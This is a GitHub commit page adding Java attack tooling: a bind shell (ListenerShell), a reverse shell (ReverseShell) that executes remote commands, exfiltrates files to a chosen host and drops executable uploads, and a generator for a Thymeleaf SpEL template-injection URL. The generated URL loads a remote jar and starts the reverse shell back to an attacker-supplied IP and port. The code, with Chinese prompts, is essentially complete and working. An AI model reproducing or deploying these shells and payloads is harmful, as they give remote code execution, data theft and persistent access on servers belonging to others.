Skip to content

Commit 78e87fb

Browse files
author
threedr3am
committed
feat common
1. 添加两个常用shell 2. thymeleaf利用generator
1 parent 73e8975 commit 78e87fb

File tree

3 files changed

+281
-0
lines changed

3 files changed

+281
-0
lines changed

common/src/main/java/ListenerShell.java

Lines changed: 110 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,110 @@
1+
import java.io.BufferedReader;
2+
import java.io.BufferedWriter;
3+
import java.io.File;
4+
import java.io.IOException;
5+
import java.io.InputStream;
6+
import java.io.InputStreamReader;
7+
import java.io.OutputStreamWriter;
8+
import java.net.ServerSocket;
9+
import java.net.Socket;
10+
import java.nio.file.Files;
11+
import java.nio.file.Path;
12+
import java.nio.file.Paths;
13+
14+
/**
15+
* @author threedr3am
16+
*/
17+
public class ListenerShell implements Runnable {
18+
19+
private String port;
20+
21+
public ListenerShell(String port) {
22+
this.port = port;
23+
new Thread(this).start();
24+
}
25+
26+
@Override
27+
public void run() {
28+
try {
29+
ServerSocket serverSocket = new ServerSocket(Integer.parseInt(port));
30+
Socket socket = serverSocket.accept();
31+
BufferedWriter bufferedWriter = new BufferedWriter(
32+
new OutputStreamWriter(socket.getOutputStream()));
33+
bufferedWriter.write("success!");
34+
bufferedWriter.newLine();
35+
bufferedWriter.flush();
36+
37+
BufferedReader bufferedReader = new BufferedReader(
38+
new InputStreamReader(socket.getInputStream()));
39+
40+
while (true) {
41+
String line = bufferedReader.readLine();
42+
if (line.equals("exit"))
43+
return;
44+
Process pro = null;
45+
try {
46+
if (line.startsWith("${IFS}")) {
47+
line = line.substring(6);
48+
String[] cmd = line.split("\\$\\{IFS\\}");
49+
pro = Runtime.getRuntime().exec(cmd);
50+
} else if (line.startsWith("download")) {
51+
line = line.substring(8).trim();
52+
String[] cmd = line.split(" ");
53+
String file = cmd[0];
54+
String ip = cmd[1];
55+
String port = cmd[2];
56+
byte[] bytes = Files.readAllBytes(Paths.get(file));
57+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
58+
transferFileSocket.getOutputStream().write(bytes);
59+
transferFileSocket.getOutputStream().flush();
60+
transferFileSocket.getOutputStream().close();
61+
transferFileSocket.close();
62+
} else if (line.startsWith("upload")) {
63+
line = line.substring(6).trim();
64+
String[] cmd = line.split(" ");
65+
String file = cmd[0];
66+
String ip = cmd[1];
67+
String port = cmd[2];
68+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
69+
InputStream inputStream = transferFileSocket.getInputStream();
70+
Path path = Paths.get(file);
71+
Files.copy(inputStream, path);
72+
if (Files.exists(path)) {
73+
File toSetFile = path.toFile();
74+
toSetFile.setExecutable(true);
75+
toSetFile.setReadable(true);
76+
toSetFile.setWritable(true);
77+
}
78+
inputStream.close();
79+
transferFileSocket.close();
80+
} else {
81+
pro = Runtime.getRuntime().exec(line);
82+
}
83+
} catch (Exception e) {
84+
bufferedWriter.write(e.getMessage());
85+
bufferedWriter.newLine();
86+
bufferedWriter.flush();
87+
}
88+
BufferedReader bufferedReader2 = new BufferedReader(new InputStreamReader(pro.getInputStream()));
89+
StringBuilder stringBuilder2 = new StringBuilder();
90+
String line2;
91+
while ((line2 = bufferedReader2.readLine()) != null) {
92+
stringBuilder2.append(line2).append("\n");
93+
}
94+
bufferedWriter.write(stringBuilder2.toString());
95+
bufferedWriter.newLine();
96+
bufferedWriter.flush();
97+
}
98+
} catch (IOException e) {
99+
}
100+
}
101+
102+
public static void main(String[] args) throws Exception {
103+
// InputStream inputStream = ReverseShell.class.getResourceAsStream("ListenerShell.class");
104+
// byte[] bytes = new byte[inputStream.available()];
105+
// inputStream.read(bytes);
106+
// String code = Utility.encode(bytes, true);
107+
// System.out.println("$$BCEL$$" + code);
108+
new ListenerShell(args[0]);
109+
}
110+
}

common/src/main/java/ReverseShell.java

Lines changed: 127 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,127 @@
1+
import com.sun.org.apache.bcel.internal.classfile.Utility;
2+
import java.io.BufferedReader;
3+
import java.io.BufferedWriter;
4+
import java.io.File;
5+
import java.io.IOException;
6+
import java.io.InputStream;
7+
import java.io.InputStreamReader;
8+
import java.io.OutputStream;
9+
import java.io.OutputStreamWriter;
10+
import java.net.Socket;
11+
import java.nio.file.Files;
12+
import java.nio.file.Path;
13+
import java.nio.file.Paths;
14+
import java.util.Base64;
15+
16+
public class ReverseShell implements Runnable {
17+
18+
private String ip;
19+
private Integer port;
20+
21+
private InputStream inputStream;
22+
private OutputStream outputStream;
23+
24+
public ReverseShell(String ip, Integer port) {
25+
this.ip = ip;
26+
this.port = port;
27+
new Thread(this).start();
28+
}
29+
30+
public ReverseShell(InputStream inputStream, OutputStream outputStream) {
31+
this.inputStream = inputStream;
32+
this.outputStream = outputStream;
33+
new Thread(this).start();
34+
}
35+
36+
@Override
37+
public void run() {
38+
if (outputStream != null && inputStream != null) {
39+
try {
40+
BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream));
41+
BufferedReader read = new BufferedReader(new InputStreamReader(inputStream));
42+
String line2;
43+
while ((line2 = read.readLine()) != null) {
44+
bufferedWriter.write(line2);
45+
bufferedWriter.newLine();
46+
bufferedWriter.flush();
47+
}
48+
} catch (Exception e) {}
49+
} else {
50+
try {
51+
Socket socket = new Socket(ip, port);
52+
BufferedWriter bufferedWriter = new BufferedWriter(
53+
new OutputStreamWriter(socket.getOutputStream()));
54+
bufferedWriter.write("success!");
55+
bufferedWriter.newLine();
56+
bufferedWriter.flush();
57+
58+
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
59+
while (true) {
60+
String line = bufferedReader.readLine();
61+
if (line.equals("exit"))
62+
return;
63+
Process pro = null;
64+
try {
65+
if (line.startsWith("${IFS}")) {
66+
line = line.substring(6);
67+
String[] cmd = line.split("\\$\\{IFS\\}");
68+
pro = Runtime.getRuntime().exec(cmd);
69+
} else if (line.startsWith("download")) {
70+
line = line.substring(8).trim();
71+
String[] cmd = line.split(" ");
72+
String file = cmd[0];
73+
String ip = cmd[1];
74+
String port = cmd[2];
75+
byte[] bytes = Files.readAllBytes(Paths.get(file));
76+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
77+
transferFileSocket.getOutputStream().write(bytes);
78+
transferFileSocket.getOutputStream().flush();
79+
transferFileSocket.getOutputStream().close();
80+
transferFileSocket.close();
81+
} else if (line.startsWith("upload")) {
82+
line = line.substring(6).trim();
83+
String[] cmd = line.split(" ");
84+
String file = cmd[0];
85+
String ip = cmd[1];
86+
String port = cmd[2];
87+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
88+
InputStream inputStream = transferFileSocket.getInputStream();
89+
Path path = Paths.get(file);
90+
Files.copy(inputStream, path);
91+
if (Files.exists(path)) {
92+
File toSetFile = path.toFile();
93+
toSetFile.setExecutable(true);
94+
toSetFile.setReadable(true);
95+
toSetFile.setWritable(true);
96+
}
97+
inputStream.close();
98+
transferFileSocket.close();
99+
} else {
100+
pro = Runtime.getRuntime().exec(line);
101+
}
102+
} catch (Exception e) {
103+
bufferedWriter.write(e.getMessage());
104+
bufferedWriter.newLine();
105+
bufferedWriter.flush();
106+
}
107+
if (pro == null) {
108+
continue;
109+
}
110+
111+
new ReverseShell(pro.getInputStream(), socket.getOutputStream());
112+
new ReverseShell(pro.getErrorStream(), socket.getOutputStream());
113+
}
114+
115+
} catch (IOException e) {}
116+
}
117+
}
118+
119+
public static void main(String[] args) throws Exception {
120+
InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class");
121+
byte[] bytes = new byte[inputStream.available()];
122+
inputStream.read(bytes);
123+
String code = Utility.encode(bytes, true);
124+
System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes()));
125+
// new ReverseShell("127.0.0.1", 12345);
126+
}
127+
}

common/src/main/java/ThymeleafSpelExp.java

Lines changed: 44 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,44 @@
1+
import java.util.Scanner;
2+
3+
/**
4+
* @author threedr3am
5+
*/
6+
public class ThymeleafSpelExp {
7+
public static void main(String[] args) {
8+
Scanner scanner = new Scanner(System.in);
9+
System.out.println("请输入目标URL:");
10+
String host = scanner.nextLine();
11+
System.out.println("请输入下载jar地址:");
12+
String jarUrl = scanner.nextLine();
13+
System.out.println("请输入反弹shell接收ip:");
14+
String ip = scanner.nextLine();
15+
System.out.println("请输入反弹shell接收port:");
16+
int port = Integer.parseInt(scanner.nextLine());
17+
18+
StringBuilder spelBuilder = new StringBuilder()
19+
.append("__${new java.net.URLClassLoader(new java.net.URL%5B%5D{new java.net.URL(T(String).valueOf(new char%5B%5D {")
20+
.append(stringToBytesStr(jarUrl))
21+
.append("}))}).loadClass(T(String).valueOf(new char%5B%5D{")
22+
.append(stringToBytesStr("ReverseShell"))
23+
.append("})).getConstructor(T(String), T(Integer)).newInstance(T(String).valueOf(new char%5B%5D {")
24+
.append(stringToBytesStr(ip))
25+
.append("}), ")
26+
.append(port)
27+
.append(").toString()}__::.x")
28+
;
29+
String spel = spelBuilder.toString();
30+
System.out.println("SPEL:");
31+
System.out.println(host+"/"+spel);
32+
}
33+
34+
private static String stringToBytesStr(String string) {
35+
StringBuilder stringBuilder = new StringBuilder();
36+
for (int i = 0; i < string.length(); i++) {
37+
stringBuilder.append(String.format("%d", (byte)string.charAt(i)));
38+
if (string.length() - 1 != i) {
39+
stringBuilder.append(",");
40+
}
41+
}
42+
return stringBuilder.toString();
43+
}
44+
}

0 commit comments

Comments
 (0)